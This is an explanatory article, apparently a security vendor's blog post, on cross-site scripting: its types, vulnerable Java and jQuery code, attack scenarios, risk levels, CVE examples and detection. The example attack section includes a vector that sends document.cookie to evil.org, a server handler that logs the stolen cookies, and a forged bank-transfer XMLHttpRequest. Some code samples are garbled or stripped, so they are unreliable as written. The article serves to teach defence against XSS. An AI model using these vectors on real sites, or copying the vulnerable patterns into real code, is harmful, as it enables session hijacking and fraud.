Which of the given XSS attacks exploits a vulnerability on the client side?

With the world switching to remote work on a scale never seen previously, cybercriminals have become more active than ever. Security at many organizations has suffered since workers have started working from insecure home networks and using their own [possibly infected] personal computers. As a result, the potential danger from the most frequent attack vectors can hardly be overestimated.

Our research shows that for years now, XSS vulnerabilities have consistently taken first place in terms of prevalence online. In this article, we discuss the potential dangers and prevention of XSS cyberattacks.


Cross-site scripting, often abbreviated as XSS, is a type of attack in which malicious scripts are injected into websites and web applications for the purpose of running on the end user's device. During this process, unsanitized or unvalidated inputs [user-entered data] are used to change outputs.

Some XSS attacks do not have a specific target; the attacker simply exploits a vulnerability in the application or site, taking advantage of anyone unlucky enough to fall victim. But in many cases, XSS is performed in a more direct way, such as in an email message. An XSS attack can turn a web application or website into a vector for delivering malicious scripts to the web browsers of unsuspecting victims.

XSS attacks can exploit vulnerabilities in a range of programming environments, including VBScript, Flash, ActiveX, and JavaScript. Most often, XSS targets JavaScript because of the language's tight integration with most browsers. This ability to exploit commonly used platforms makes XSS attacks both dangerous and common.

How cross-site scripting works

Armed with this idea of what a cross-site scripting attack is, let's see how it works.

Imagine a person sitting at a computer. The screen shows a file manager, text editor, spreadsheet, and music player icon in the lower-right corner. All is ordinary and familiar so far. But something is missing from this picture—an Internet browser with dozens of tabs open simultaneously.

These tabs are filled with interesting headlines, funny videos, ads for sporting goods, online stores, and a payment site with a just-paid receipt for a speeding ticket. All of these sites have one thing in common: they would hardly be possible without JavaScript.

Then a simple click on an advertising banner triggers another page. The page contains a script that connects to an online banking site and quietly transfers money from the user's account to the attacker's card. Rather unpleasant, to put it mildly. Fortunately, browsers eliminate this possibility thanks to the same-origin policy [SOP]. This policy ensures that the scripts executed on a web page don't have access to the wrong data. If scripts have been loaded from a different domain, the browser won't be able to run them.

Does this guarantee a happy ending?

If it did, this article wouldn't exist. Cybercriminals use various methods to bypass the SOP and exploit application vulnerabilities. When successful, they make the user's browser execute an arbitrary script on a given page.

Making an attack to infect a website

The same-origin policy is supposed to allow scripts only when a script is loaded from the same domain as the page that the user is currently viewing. And in reality, attackers don't have direct access to the server responsible for the page displayed by the browser. So how do attackers do it?

Application vulnerabilities can help attackers by enabling them to embed fragments and malicious code in page content.

For example, a typical search engine echoes the user's query when displaying search results. What if the user tries to find the string " alert [1] "? Will the contents of the search results page lead to this script being executed, and will a dialog box with the message "1" appear? This depends on how well the web application developers verify user input and transform it into a safe format.

The main difficulty lies in the fact that users run a wide variety of browser versions, from the latest pre-alphas to ones that are no longer supported. Every browser handles web pages in a slightly different way. In some cases, an XSS attack can be quite successful when inputs are not sufficiently filtered. So the first step in an XSS attack is to determine how to embed user data on a web page.

Infected website attacks users

The second step is for the attacker to convince the user to visit a specific page. The attacker also needs to pass the attack vector to the page. Once again, there is nothing here that poses a serious obstacle. Websites often accept data as part of a URL. To implement the attack vector, attackers can use various social engineering or phishing methods.

The following example code displays just such a string [passed by the user in the HTTP request] in the server's response:


protected void doGet[HttpServletRequest request, HttpServletResponse resp] { String firstName = request.getParameter["firstName"]; resp.getWriter[].append["

"]; resp.getWriter[].append["Search for " + firstName]; resp.getWriter[].append["
"]; }

The code processes the value of the first URL parameter passed in the user's request. Then it displays the parameter on the resulting web page. The developer seemingly doesn't expect to see anything other than plain text without HTML tags in the firstName parameter. If the attacker sends the request "//very.good.site/search?firstName= alert [ 1] ", the final page will look as follows:


Search for alert[1]

You can easily check that when this HTML fragment is loaded onto a web page in the user's browser, the script passed in the firstName URL parameter is executed. In this case, malicious JavaScript is executed in the context of the vulnerable server. The script can therefore access the domain's cookie data, its API, and more. Of course, the attacker will develop the actual vector in a way that conceals their presence on the user-viewed page.

Statistics and analytics

According to Positive Technologies analytics, XSS is among the three most common web application attacks. The relative percentage of XSS compared to other attack types has dipped in previous years. Still, there is no sign of XSS losing popularity.

Why is XSS still near the top of the list? Consider the number of vulnerable websites. As detailed in our 2019 report, more than two-thirds of tested websites had XSS vulnerabilities.

Sectors most commonly targeted by XSS are hospitality and entertainment [33%], finance [29%], education and science [29%], and transportation [26%]. IT [16%] and government [16%] are also impacted, but not to the same extent.

Types of cross-site scripting attacks

Most XSS attacks can be divided into three categories:

  • Reflected [non-persistent]. The carrier of the attack vector is the current client HTTP request. The server returns a response containing the attack vector. In essence, the server reflects the attack.
  • Stored [persistent]. The attack vector is located on the server side. [We will talk about how exactly it gets there a bit later in this article.]
  • DOM-based XSS [Document Object Model]. The attack vector is on the client side. Exploitation is possible primarily due to flaws in data processing inside JavaScript code.

A few other categories exist as well, although they are seen less frequently. They include:

  • Flash-based XSS. This vulnerability comes from insufficient processing of user input in Flash applications.
  • XSSI. Resources that are hosted on external domains and servers are vulnerable.

Browser vulnerabilities can also contribute to XSS risks, for example:

  • uXSS [Universal XSS]. This vulnerability allows bypassing the SOP to execute JavaScript from one site on another.
  • mXSS [Mutation XSS]. Attackers bypass filtering by putting an HTML payload into the DOM with "JavaScript [[element] .innerHTML =% value%" or "document.write [% value%]]" in order to change it from safe to potentially dangerous.

Reflected [non-persistent] XSS

In reflected XSS, the attack vector is inside the HTTP client request processed by the server. If the server's request and response are semantically related, the server's response is formed from the request data. For example, the request could be a search query and the response might be the results page.

Reflected XSS occurs if the server does a poor job of processing HTML escape sequences. In this case, the page as displayed on the server side will cause JavaScript to be executed in the context of the server, which is part of the original attack vector.

Example of reflected [non-persistent] XSS

Here is an example of thecode vulnerable code below.to reflected XSS:


protected void info[HttpServletResponse resp, String info] { resp.getWriter[].append["


"]; resp.getWriter[].append[info]; }

Stored [persistent] XSS

This type of application vulnerability occurs when a attack vector contains JavaScript that doesn't come in a user request. Instead, the JavaScript code is downloaded from the server [such as the database or file system].

The application might allow you to save data from an untrusted source and, subsequently, use this data to generate a server response to a client's request. Paired with poor handling of HTML escape sequences, this presents an opportunity for a stored XSS attack.

Imagine an online forum where people communicate regularly. If the application is vulnerable, an attacker can post a message with embedded JavaScript. The message will be saved in the system database. After that, the script in question will be executed by all users who read the message posted by the attacker.

Example of stored [persistent] XSS

An example of code for exploitation of stored XSS vulnerabilities:


protected void doGet[HttpServletRequest rq, HttpServletResponse resp] { String name = rq.getParameter["NAME"]; StringBuffer res = new StringBuffer[]; String query = "SELECT fullname FROM emp WHERE name = '" + name + "'"; ResultSet rs = DB.createStatement[].executeQuery[query]; res.append["

Employee"]; while [rs.next[]] { res.append[""]; } res.append["
"]; res.append[rs.getString["fullname"]]; res.append["
"]; resp.getWriter[].append[res.toString[]]; }

Here, data is read from the database and the results are passed along without client verification. If the data stored in the database contains HTML escape sequences, including JavaScript, the data will be passed to the client and executed by the browser in the context of the web application.

DOM-based attacks

The two types of XSS vulnerabilities described above have something in common: the web page with embedded JavaScript is formed on the server side. However, the client frameworks used in modern web applications allow changing a web page without accessing the server. The document object model can be modified directly on the client side.

The main premise behind this vulnerability remains the same: specifically, poorly implemented processing of HTML escape sequences. This leads to attacker-controlled JavaScript appearing in the text of a web page. Then this code is executed in the server context.

Example of DOM-based attacks

Here is code for exploiting this type of vulnerability:


This is a warning alert

The HTML code has an element with the "message-text" identifier, meaning that it is used to display the text of a message. The DOM tree is then modified by the following JavaScript function:


function warning[message] { $["#message-text"].html[message]; $["#message"].prop['style', 'display:inherit']; }

The script displays the message with the html[] function, which doesn't sanitize HTML escape sequences. Therefore, such an implementation is vulnerable. For example, the following could be passed to this function:

alert ["XSS"]

In this case, the script will be executed in the server context.

Cross-site scripting [XSS] examples

Before we go into specific examples, we should also point out an important distinction. Some XSS attacks are aimed at acquiring information only once. In these cases, the victim computer executes a malicious script and sends stolen information to an attacker-controlled server.

Other attacks, however, focus on repeated exploits by:

  • Hijacking a user session and logging in to the account to collect information.
  • Phishing and logging in to an account with the username and password.
  • Changing the password of the victim. This is possible when the application allows changing or resetting passwords without having to enter the old password [or a one-time code].
  • Creating a new privileged user, when the victim has the rights to do so.
  • Implanting a JavaScript backdoor. For this, the victim needs to have rights to edit page content. This could also involve stored XSS on frequently visited pages, if the victim has the necessary rights.
  • Application attacks by leveraging the victim's rights have targeted WordPress [remote code execution [RCE] through the template/plugin editor in the admin panel] and Joomla [RCE through download of arbitrary files].

As we have seen, XSS allows executing JavaScript in the context of a vulnerable web application. But unlike SQLi, XXE, AFR, and others, JavaScript scripts are executed in the end user's web browser. The primary goal of an XSS attack is to access the user's resources. Let's look at a few examples of such attacks.

1. Session hijacking

Imagine the following scenario. A user opens a browser and goes to an online banking page. The user is prompted to log in with their username and password. Obviously, the user's subsequent actions should then be regarded as legitimate. But how do you verify this legitimacy without asking the user to log in after every single click?

Fortunately for users, there is a way of doing that. After successful authentication, the server generates a string that uniquely identifies the current user session. This string is passed in a response header, in the form of cookie data. The following screenshot shows an example of a server response in which the session cookie is called JSESSIONID:

On subsequent visits to the server, the cookie data will be automatically included in the request. This data will be used by the server to determine whether the request comes from a legitimate user. Naturally, the security of session cookies then becomes critical. Any interception of this information would enable impersonating a legitimate user.

One of the classic ways to transfer session cookie data to an attacker is to send an HTTP request from the user's web browser to an attacker-controlled server. In this case, the request is generated by JavaScript that is embedded on a vulnerable web page. The cookie data is then transmitted in the parameters of this request. One example of an attack vector could be the following:


new Image[].src="//evil.org/do?data="+document.cookie;

In this example, the user's web browser creates an image object in the DOM model. After that, it tries to load the image from the address specified in the src tag. The browser then sends the cookie data to the attacker's site with the corresponding HTTP request handler:


@GetMapping[value = "/do", produces = MediaType.IMAGE_PNG_VALUE] public @ResponseBody byte[] getImage[@RequestParam[name = "data"] String data] throws IOException { log.info["Document.cookie = {}", data]; InputStream in = getClass[].getResourceAsStream["/images/1x1.png"]; return IOUtils.toByteArray[in]; }

In this case, an attacker only needs to listen to incoming connections, or else configure event logs and obtain cookie data from the log files [this is described later in more detail].

Later on, an attacker can use session cookie data in their own requests to impersonate the user.

2. Impersonating the current user

JavaScript is a very capable programming language. An attacker can use these abilities, combined with XSS vulnerabilities, simultaneously as part of an attack vector. So instead of XSS being a way just to obtain critical user data, it can also be a way to conduct an attack directly from the user's browser.

For example, XMLHttpRequest objects are used to generate HTTP requests to web application resources. Such requests may include generating and submitting HTML forms via POST requests, which are automatic and often invisible. These requests can be used to send comments or to conduct financial transactions:


var req = new XMLHttpRequest[]; req.open['POST','//bank.org/transfer',true]; req.setRequestHeader['Content-type','application/x-www-form-urlencoded']; req.send['from=A&to=B&amount=1000'];

By exploiting an XSS vulnerability with this attack vector, malicious actors can transfer any specified amount of money to their accounts.

3. Phishing attacks

As noted already, XSS can be used to embed JavaScript scripts that modify the DOM model in a web page. This allows an attacker to change how the website appears to the user, such as by creating fake input forms. If a vulnerable web application permits modifications to the DOM model, an attacker could inject a fake authentication form into the web page by using the following attack vector:


Please login to proceed



The following form will be displayedthen appears on the web page:

Any credentials that a user enters in this form will be sent as a POST request to the evil.org attacker website:

4. Capture keystrokes

Opportunities for exploiting XSS vulnerabilities are not limited to executable scripts. If an attacker has an Internet server, malicious scripts can be loaded directly from it. An attacker could deploy the following script to capture keystrokes:


Search for alert[1]


The script here implements a keystroke interceptor that saves the corresponding character and timestamp to the internal buffer. It also implements a function that sends data stored in the buffer twice per second to the evil.org attacker server.

In order to embed this keylogger script on a target web page, actors can use the following attack vector:


Search for alert[1]


After the exploit is triggered, the user's keystrokes on the web page will be redirected to the attacker server:

The screenshot shows entries from the event log on the attacker server. In this example, the user has typed "James" on the keyboard. These records show keystrokes presented in JSON format: the field "k" contains a character and the field "t" contains the corresponding timestamp.

What are the consequences of XSS attacks?

From these examples and attack vectors, it is clear that a successful XSS attack on a vulnerable web application gives attackers a very powerful tool. With XSS, attackers have the capability to:

  • Read any data and perform arbitrary actions by impersonating the user. Such actions may include posting on social media or conducting banking transactions.
  • Intercept user input.
  • Deface web pages.
  • Inject malicious code into web pages. Such functionality may be reminiscent of Trojans, including fake forms for entering credentials or paying for online orders.

Cross-site scripting attacks can also be leveraged for financial benefit in more indirect ways. For example, severe XSS attacks can be used to embed advertising information or manipulate Internet ratings through DOM modification.

Risk levels of XSS vulnerabilities

Impact typically depends on the type of XSS vulnerability [for example, stored or reflected], difficulty of implementation, and whether it requires authentication [perhaps not everybody has access to the page in question].

Other factors include what, if any, additional actions are required from the user; whether the attack is triggered reliably; and what exactly could a potential attacker gain. If the site does not contain private information [because of there being no authentication or distinction between users], then the impact is minimal.

The Positive Technologies Security Threatscape divides XSS into three categories:

  • Low. Vulnerabilities on routers or other local devices requiring authorization. XSS here requires privileged user rights, or, roughly speaking, self-XSS. Since the difficulty of an attack is relatively high, the resulting impact is small.
  • Medium. Here we refer to all reflected and stored XSS attacks that require visiting a certain page [social engineering]. This is more critical and has a greater impact, since stored XSS is easier for attackers. But because the user must still log in first, the criticality is not so high.
  • High. In this case, the user independently visits a page that contains a malicious script. Some examples are XSS in a personal message, a blog comment, or an admin panel that appears immediately after login [in the user list via username or in logs through useragent].

A website might have stored XSS, resulting in High impact. However, if you need a certain level of access to visit that site, then the impact is reduced to Medium.

It's also important to mention that in any case, impact depends on the author's assessment of criticality—researchers have their own viewpoints. XSS vulnerabilities can be of high severity, but typically they receive scores below those given to other types of attacks.

Examples of vulnerabilities

The following examples come from Positive Research or automated detections by Positive Technologies security products such as MaxPatrol and PT Application Inspector. Severity levels are those valid as of the vulnerability publication date.

  • Advantech WebAccess: CVE-2015-3948
  • Severity level: Low
  • Advantech WebAccess versions prior to 8.1 allow remote injection of arbitrary web scripts or HTML through authenticated users. As a result, attackers can obtain sensitive information.
PT-2016-02: Cross-Site Scripting in Advantech WebAccess
  • SAP NetWeaver Development Infrastructure Cockpit: CVE: not assigned
  • Severity level: Medium
  • A vulnerability was detected in the nwdicockpit/srv/data/userprefs component of SAP NetWeaver Development Infrastructure Cockpit, by means of which malicious code could be injected into a victim's browser and executed.
PT-2018-40: Stored XSS in SAP NetWeaver Development Infrastructure Cockpit

Wonderware Information Server: CVE-2013-0688

Severity level: High

A vulnerability in Wonderware Information Server allows attackers to inject arbitrary code into a web page viewed by other users or to bypass client-side security in web browsers. The attack can be initiated remotely and no authentication is required for successful exploitation.

PT-2013-37: Multiple Cross-Site Scripting [XSS] in Wonderware Information Server

Detecting and testing for XSS

The best way to test your own application, or one for which you have source code, is by combining manual and automated techniques. Static code analysis should be able to detect a number of XSS vulnerabilities.

How well detection works depends heavily on the scanner. Different scanners vary in vectors and techniques, so some will be more reliable than others, and none of them will be perfect. For example, there is a chance that a manual tester will be able to find issues that a black-box scanner missed. If you want to ramp up automation test coverage, you could implement a gray-/white-box solution to accommodate the black-box approach.

Another hazard to bear in mind is the possibility of false positives. Combining techniques and tools will improve the outcome, but certain issues will still take manual work to identify.

Here is a video from our colleague with an example. This particular case involves vulnerabilities in the Acorn JavaScript parser. Many other parsers have this vulnerability as well.

Any XSS vulnerability analyzer requires JavaScript and HTML inputs. If the parser can't recognize the JavaScript code in any part of the page, then this code will not be correctly passed to the analyzer. This means that by tricking the parser, it is possible to make a successful XSS attack that bypasses the scanner entirely.

The specific code that is not recognized by the Acorn parser [as of the time of the video's release] is presented below.

Tag Attribute Injection :

where entry equals >

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